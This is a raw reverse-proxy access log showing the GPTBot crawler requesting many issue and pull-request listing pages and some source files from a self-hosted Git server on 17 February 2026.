[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/status.json?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/status.json" +[17/Feb/2026:19:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=closed&type=all" +[17/Feb/2026:19:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:26:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt?display=source" [Client 74.7.227.38] [Length 11287] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache?display=source" [Client 74.7.227.38] [Length 11150] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:19:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:19:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:26:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 123935] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:26:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:26:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:26:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr 